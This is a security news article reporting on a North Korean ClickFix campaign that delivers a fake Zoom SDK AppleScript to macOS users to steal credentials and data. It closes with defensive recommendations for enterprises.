North Korea Uses ClickFix to Target macOS Users' Data

ClickFix, a social‑engineering ploy that masquerades as remote‑support assistance, has surged in popularity over the past year. While initially seen in Windows‑centric attacks, the technique is now being weaponized against macOS users by North Korean actors. By exploiting the trust users place in video‑conference tools and the routine nature of software updates, attackers can coax victims into executing malicious code with minimal suspicion. This evolution underscores the adaptability of state‑sponsored threat groups, who continuously refine their lures to match platform‑specific user behaviors.

The Sapphire Sleet operation distinguishes itself through a sophisticated AppleScript delivery chain. Victims receive a fabricated Zoom SDK update, an AppleScript file that opens automatically in macOS Script Editor. Once executed, the script runs a series of curl commands that fetch additional AppleScript payloads, establishing a beacon, harvesting credentials, and deploying backdoors. Notably, the malware manipulates the Transparency, Consent, and Control (TCC) database, renaming critical files to suppress user prompts and silently exfiltrate data from wallets, browsers, keychains, Apple Notes, and even Telegram. This bypass of macOS’s consent framework represents a significant escalation in the threat landscape for Apple environments.

For enterprises, the incident highlights the urgent need to reinforce both technical and human defenses. Microsoft’s recommendations—blocking unsigned .scpt files, restricting execution of Mach‑O binaries, and conducting targeted user training on ClickFix tactics—provide a practical roadmap. Additionally, organizations should monitor for indicators of compromise associated with the campaign and ensure macOS devices receive Apple’s latest security patches. As nation‑state actors continue to diversify their attack vectors, a layered security posture that combines endpoint hardening with continuous awareness programs will be essential to mitigate the risk of credential theft and financial loss.